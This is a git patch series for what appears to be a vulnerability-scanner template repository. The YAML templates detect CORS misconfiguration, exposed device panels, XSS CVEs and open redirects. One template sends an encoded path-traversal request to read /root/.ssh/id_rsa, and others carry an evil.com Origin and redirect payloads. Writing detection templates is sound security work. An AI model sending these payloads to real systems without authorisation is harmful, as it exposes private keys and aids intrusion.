From d8e0fd3ef0ab77ba5b07b00a26fa755894a4c34f Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:40:04 -0300 Subject: [PATCH 01/52] add cors-misconfig.yaml --- cors-misconfig.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cors-misconfig.yaml diff --git a/cors-misconfig.yaml b/cors-misconfig.yaml new file mode 100644 index 0000000000..4d3fff5153 --- /dev/null +++ b/cors-misconfig.yaml @@ -0,0 +1,23 @@ +id: cors-misconfig + +info: + name: Cross-Origin Resource Sharing Misconfiguration + author: G4L1T0 and @convisoappsec + severity: info + tags: cors + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 + Origin: https://www.convisoappsec.com + matchers: + - type: word + part: header + words: + - "Access-Control-Allow-Origin: https://www.convisoappsec.com" + - "Access-Control-Allow-Origin: *" + condition: or + From e98fb7179e1c2ca2895806fe3dd78ef7b651b8c6 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:56:37 -0300 Subject: [PATCH 02/52] update cors-misconfig.yaml --- .../generic/cors-misconfig.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cors-misconfig.yaml => vulnerabilities/generic/cors-misconfig.yaml (100%) diff --git a/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml similarity index 100% rename from cors-misconfig.yaml rename to vulnerabilities/generic/cors-misconfig.yaml From a44324ec2f2b57bea9a3e2a6d2a696d9771ccef7 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:57:37 -0300 Subject: [PATCH 03/52] updatev2 cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml index 4d3fff5153..6c3b810df0 100644 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -2,7 +2,7 @@ id: cors-misconfig info: name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec + author: G4L1T0 and @convisoappsec severity: info tags: cors @@ -20,4 +20,3 @@ requests: - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - "Access-Control-Allow-Origin: *" condition: or - From cb94b580094c97218cd87b2c76f78f63aeaa09f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:13:45 +0530 Subject: [PATCH 04/52] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index a224186e83..85f9ebd824 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -2,7 +2,7 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration - author: nadino + author: nadino,G4L1T0,convisoappsec severity: info tags: cors @@ -13,6 +13,7 @@ requests: headers: Origin: https://evil.com + matchers-condition: or matchers: - type: word words: @@ -20,3 +21,8 @@ requests: - "Access-Control-Allow-Credentials: true" condition: and part: header + + - type: word + part: header + words: + - "Access-Control-Allow-Origin: *" From 5ac272597b8ab5d98d76740bf8edecfc8308c443 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:14:04 +0530 Subject: [PATCH 05/52] Delete cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 22 --------------------- 1 file changed, 22 deletions(-) delete mode 100644 vulnerabilities/generic/cors-misconfig.yaml diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml deleted file mode 100644 index 6c3b810df0..0000000000 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cors-misconfig - -info: - name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec - severity: info - tags: cors - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 - Origin: https://www.convisoappsec.com - matchers: - - type: word - part: header - words: - - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - - "Access-Control-Allow-Origin: *" - condition: or From b466fce758464476a2a822d244d834d893d6ae2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:15:04 +0530 Subject: [PATCH 06/52] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index 85f9ebd824..f652c891f0 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -4,7 +4,8 @@ info: name: Basic CORS misconfiguration author: nadino,G4L1T0,convisoappsec severity: info - tags: cors + reference: https://portswigger.net/web-security/cors + tags: cors,generic requests: - method: GET From 3ba3b9ac4212760989db21f70dd809475c71c82c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:42:01 +0530 Subject: [PATCH 07/52] Create npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml new file mode 100644 index 0000000000..b6385dd3e8 --- /dev/null +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -0,0 +1,26 @@ +id: npm-techdocs-common + +info: + name: NPM - techdocs-common - Directory Traversal + author: dhiyaneshDk + severity: high + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN OPENSSH PRIVATE KEY" + - "BEGIN PRIVATE KEY" + - "BEGIN RSA PRIVATE KEY" + condition: or + + - type: status + status: + - 200 + From 7863c1fdb97687042107601f8cadeb5c2749e958 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:44:03 +0530 Subject: [PATCH 08/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index b6385dd3e8..fbaed9e23a 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,12 +5,10 @@ info: author: dhiyaneshDk severity: high tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or - - type: status status: - 200 From 1f5edde716bf4dadef62abd686c088fd28fd3060 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:46:28 +0530 Subject: [PATCH 09/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index fbaed9e23a..d5f308a715 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" matchers-condition: and matchers: - type: word @@ -20,4 +20,3 @@ requests: - type: status status: - 200 - From b521701607bba8a5f890845e4c389468565e85e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 01:52:54 +0530 Subject: [PATCH 10/52] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index d5f308a715..25df5e032b 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,10 +5,12 @@ info: author: dhiyaneshDk severity: high tags: config,exposure + requests: - method: GET path: - -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or + - type: status status: - 200 From 5e24f6400775999e235922612916f05609a7bb6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 22 Aug 2021 23:40:10 +0530 Subject: [PATCH 11/52] Delete npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml deleted file mode 100644 index 25df5e032b..0000000000 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: npm-techdocs-common - -info: - name: NPM - techdocs-common - Directory Traversal - author: dhiyaneshDk - severity: high - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - - matchers-condition: and - matchers: - - type: word - words: - - "BEGIN OPENSSH PRIVATE KEY" - - "BEGIN PRIVATE KEY" - - "BEGIN RSA PRIVATE KEY" - condition: or - - - type: status - status: - - 200 From 61f9470d22d53c1f8950e93ad100816826b0a780 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 09:27:54 +0530 Subject: [PATCH 12/52] Add files via upload --- iot/epson-unauthorized-access-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 iot/epson-unauthorized-access-detect.yaml diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml new file mode 100644 index 0000000000..641538010a --- /dev/null +++ b/iot/epson-unauthorized-access-detect.yaml @@ -0,0 +1,21 @@ +id: epson-unauthorized-access-detect +info: + name: Epson Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6922 + tags: iot,printer +requests: + - method: GET + path: + - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" + - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" + matchers-condition: and + matchers: + - type: word + words: + - "epson" + - "DNS/Proxy Setup" + - type: status + status: + - 200 \ No newline at end of file From d119642410beb1fa763ba279a5eb6432be072493 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 09:54:34 +0530 Subject: [PATCH 13/52] Add files via upload --- iot/epson-web-control-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 iot/epson-web-control-detect.yaml diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml new file mode 100644 index 0000000000..eb95e738dc --- /dev/null +++ b/iot/epson-web-control-detect.yaml @@ -0,0 +1,22 @@ +id: epson-web-control-detect +info: + name: Epson Printer + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/6873 + tags: iot,printer +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and + matchers: + - type: word + words: + - "epson web control" + - "advanced" + - "OSD control Pad" + - "Status Information" + - type: status + status: + - 200 \ No newline at end of file From 52177cb9f494ddf387d05faa8039877d51d90422 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 24 Aug 2021 10:35:51 +0530 Subject: [PATCH 14/52] Add files via upload --- iot/epson-unauthorized-access-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml index 641538010a..5cbeaef202 100644 --- a/iot/epson-unauthorized-access-detect.yaml +++ b/iot/epson-unauthorized-access-detect.yaml @@ -10,12 +10,15 @@ requests: path: - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" + - "{{BaseURL}}/PRESENTATION/ADVANCED/COMMON/TOP" matchers-condition: and matchers: - type: word words: - "epson" - "DNS/Proxy Setup" + - "Network Status" + - "Status" - type: status status: - - 200 \ No newline at end of file + - 200 \ No newline at end of file From d80c32a3794c2b388a8c150d1ddcdaea0519be7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:18:50 +0530 Subject: [PATCH 15/52] Update epson-web-control-detect.yaml --- iot/epson-web-control-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml index eb95e738dc..b96f5ff435 100644 --- a/iot/epson-web-control-detect.yaml +++ b/iot/epson-web-control-detect.yaml @@ -2,7 +2,7 @@ id: epson-web-control-detect info: name: Epson Printer author: pussycat0x - severity: info + severity: info reference: https://www.exploit-db.com/ghdb/6873 tags: iot,printer requests: @@ -19,4 +19,4 @@ requests: - "Status Information" - type: status status: - - 200 \ No newline at end of file + - 200 From b48f9cbaa6e915234e3c5f34994f214b574e9c5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:40:16 +0530 Subject: [PATCH 16/52] Update epson-unauthorized-access-detect.yaml --- iot/epson-unauthorized-access-detect.yaml | 24 +++++++++++++++-------- 1 file changed, 16 insertions(+), 8 deletions(-) diff --git a/iot/epson-unauthorized-access-detect.yaml b/iot/epson-unauthorized-access-detect.yaml index 5cbeaef202..4eebc7cb91 100644 --- a/iot/epson-unauthorized-access-detect.yaml +++ b/iot/epson-unauthorized-access-detect.yaml @@ -1,24 +1,32 @@ id: epson-unauthorized-access-detect + info: name: Epson Printer author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6922 - tags: iot,printer + tags: iot,printer,panel + requests: - method: GET path: - - "{{BaseURL}}/PRESENTATION/HTML/TOP/INDEX.HTML" - "{{BaseURL}}/PRESENTATION/EPSONCONNECT" - - "{{BaseURL}}/PRESENTATION/ADVANCED/COMMON/TOP" + matchers-condition: and matchers: - type: word words: - - "epson" - - "DNS/Proxy Setup" - - "Network Status" - - "Status" + - "Epson Connect" + - "/IMAGE/EPSONLOGO.PNG" + condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([A-Z-0-9]+) Series" From 57e3048d6f4f58c6921de362d5a5652028a83a32 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:57:14 +0530 Subject: [PATCH 17/52] Update epson-web-control-detect.yaml --- iot/epson-web-control-detect.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/iot/epson-web-control-detect.yaml b/iot/epson-web-control-detect.yaml index b96f5ff435..562e8a84cc 100644 --- a/iot/epson-web-control-detect.yaml +++ b/iot/epson-web-control-detect.yaml @@ -4,19 +4,22 @@ info: author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/6873 - tags: iot,printer + tags: iot,printer,panel + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and matchers: - type: word words: - - "epson web control" - - "advanced" - - "OSD control Pad" - - "Status Information" + - "Epson Web Control" + - "Basic Control" + - "Advanced" + condition: and + - type: status status: - 200 From a49982968a59be535dbc8d22819e601bf3dd263a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:58:18 +0530 Subject: [PATCH 18/52] Rename iot/epson-unauthorized-access-detect.yaml to exposed-panels/epson-unauthorized-access-detect.yaml --- {iot => exposed-panels}/epson-unauthorized-access-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {iot => exposed-panels}/epson-unauthorized-access-detect.yaml (100%) diff --git a/iot/epson-unauthorized-access-detect.yaml b/exposed-panels/epson-unauthorized-access-detect.yaml similarity index 100% rename from iot/epson-unauthorized-access-detect.yaml rename to exposed-panels/epson-unauthorized-access-detect.yaml From 36e06b0d3cd4bec3dea9dce9d2ee89660558eb88 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 15:09:40 +0530 Subject: [PATCH 19/52] Rename iot/epson-web-control-detect.yaml to exposed-panels/epson-web-control-detect.yaml --- {iot => exposed-panels}/epson-web-control-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {iot => exposed-panels}/epson-web-control-detect.yaml (100%) diff --git a/iot/epson-web-control-detect.yaml b/exposed-panels/epson-web-control-detect.yaml similarity index 100% rename from iot/epson-web-control-detect.yaml rename to exposed-panels/epson-web-control-detect.yaml From f5e70cbb98966924e52c944056d65840839ec8d3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:10:27 +0530 Subject: [PATCH 20/52] Update epson-unauthorized-access-detect.yaml --- exposed-panels/epson-unauthorized-access-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/epson-unauthorized-access-detect.yaml b/exposed-panels/epson-unauthorized-access-detect.yaml index 4eebc7cb91..a1d5e61482 100644 --- a/exposed-panels/epson-unauthorized-access-detect.yaml +++ b/exposed-panels/epson-unauthorized-access-detect.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6922 - tags: iot,printer,panel + tags: iot,printer,panel,unauth requests: - method: GET From 05c7f365562b3d39894e3a15a12562f4c24731ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:10:37 +0530 Subject: [PATCH 21/52] Update epson-web-control-detect.yaml --- exposed-panels/epson-web-control-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/epson-web-control-detect.yaml b/exposed-panels/epson-web-control-detect.yaml index 562e8a84cc..34625e5958 100644 --- a/exposed-panels/epson-web-control-detect.yaml +++ b/exposed-panels/epson-web-control-detect.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/6873 - tags: iot,printer,panel + tags: iot,printer,panel,unauth requests: - method: GET From d21e19e47b506c83fc39fdfb01f6d9f802169b41 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:54:33 +0530 Subject: [PATCH 22/52] Create honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/honeywell-web-controller.yaml diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml new file mode 100644 index 0000000000..21a061ba40 --- /dev/null +++ b/exposed-panels/honeywell-web-controller.yaml @@ -0,0 +1,22 @@ +id: honeywell-web-controller + +info: + name: Honeywell XL Web Controller + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7130 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/standard/default.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Honeywell XL Web Controller' + - type: status + status: + - 200 From 8ee3ca49fc71e909d49aded383aa6b1b2faa9445 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:56:07 +0530 Subject: [PATCH 23/52] Create ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/ibm-note-login.yaml diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml new file mode 100644 index 0000000000..b91e156e27 --- /dev/null +++ b/exposed-panels/ibm-note-login.yaml @@ -0,0 +1,22 @@ +id: ibm-note-login + +info: + name: IBM iNotes Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7122 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/names.nsf' + + matchers-condition: and + matchers: + - type: word + words: + - 'IBM iNotes Login' + - type: status + status: + - 200 From 60e28168153d18f51200bf6f00b01d850b33aef6 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Tue, 24 Aug 2021 10:29:51 -0700 Subject: [PATCH 24/52] Added CVE-2018-12095.yaml Template --- cves/2018/CVE-2018-12095.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2018/CVE-2018-12095.yaml diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml new file mode 100644 index 0000000000..fa4f64630b --- /dev/null +++ b/cves/2018/CVE-2018-12095.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-12095 + +info: + name: OEcms 3.1 - Cross-Site Scripting + author: Borna Nematzadeh + severity: medium + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + - https://www.exploit-db.com/exploits/44895 + - https://cxsecurity.com/issue/WLB-2018060092 + tags: cve,cve2018,xss,OEcms + +requests: + - method: GET + path: + - '{{BaseURL}}/cms/info.php?mod=list' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From 70845edb9d62ebe9a0eefa91763de5191168103e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:00:03 +0530 Subject: [PATCH 25/52] Create synology-web-station.yaml --- technologies/synology-web-station.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/synology-web-station.yaml diff --git a/technologies/synology-web-station.yaml b/technologies/synology-web-station.yaml new file mode 100644 index 0000000000..0493eb631b --- /dev/null +++ b/technologies/synology-web-station.yaml @@ -0,0 +1,22 @@ +id: synology-web-station + +info: + name: Synology Web Station + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7125 + tags: tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Hello! Welcome to Synology Web Station!' + - type: status + status: + - 200 From 701cc6abeb23e83ebdcbf41cb5a5498fbc2bfade Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:04:31 +0530 Subject: [PATCH 26/52] Create web-service-panel.yaml --- exposed-panels/web-service-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/web-service-panel.yaml diff --git a/exposed-panels/web-service-panel.yaml b/exposed-panels/web-service-panel.yaml new file mode 100644 index 0000000000..9a7d309981 --- /dev/null +++ b/exposed-panels/web-service-panel.yaml @@ -0,0 +1,22 @@ +id: web-service-panel + +info: + name: WEB SERVICE Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7116 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB SERVICE' + - type: status + status: + - 200 From 2285ce9faa759aa35af10ecd9f1de3140d29274d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 23:09:26 +0530 Subject: [PATCH 27/52] Create lacie-panel.yaml --- exposed-panels/lacie-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/lacie-panel.yaml diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml new file mode 100644 index 0000000000..f98eb897cc --- /dev/null +++ b/exposed-panels/lacie-panel.yaml @@ -0,0 +1,22 @@ +id: lacie-panel + +info: + name: LaCie Login Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7118 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/' + + matchers-condition: and + matchers: + - type: word + words: + - 'id_LaCie' + - type: status + status: + - 200 From 2a3b20de2c97366a5ba85bacd793ffaa8b173882 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Tue, 24 Aug 2021 12:27:07 -0700 Subject: [PATCH 28/52] Update CVE-2018-12095.yaml --- cves/2018/CVE-2018-12095.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index fa4f64630b..9cd62bafb4 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -2,7 +2,7 @@ id: CVE-2018-12095 info: name: OEcms 3.1 - Cross-Site Scripting - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 From 8fb3c65965d8c7d5a91067c541e4973054da40c9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 01:32:14 +0530 Subject: [PATCH 29/52] template fix --- vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index ebe3db78d6..d8b2d88748 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -21,7 +21,7 @@ requests: - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - - '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' matchers-condition: and From 0276758096b2e5b874eb58601450221b1f611bb3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 01:37:17 +0530 Subject: [PATCH 30/52] minor update --- cves/2019/CVE-2019-15501.yaml | 2 +- cves/2019/CVE-2019-8937.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 8101dd4fbe..3481874161 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -2,7 +2,7 @@ id: CVE-2019-15501 info: name: LSoft ListServ - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium reference: - https://www.exploit-db.com/exploits/47302 diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 167c0a4d65..ee5c4a1fff 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -2,7 +2,7 @@ id: CVE-2019-8937 info: name: HotelDruid 2.3.0 - XSS - author: Borna Nematzadeh + author: LogicalHunter severity: medium refrense: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid From 4cea960b71291da12cfc74791754fcfb6b9be2bb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa 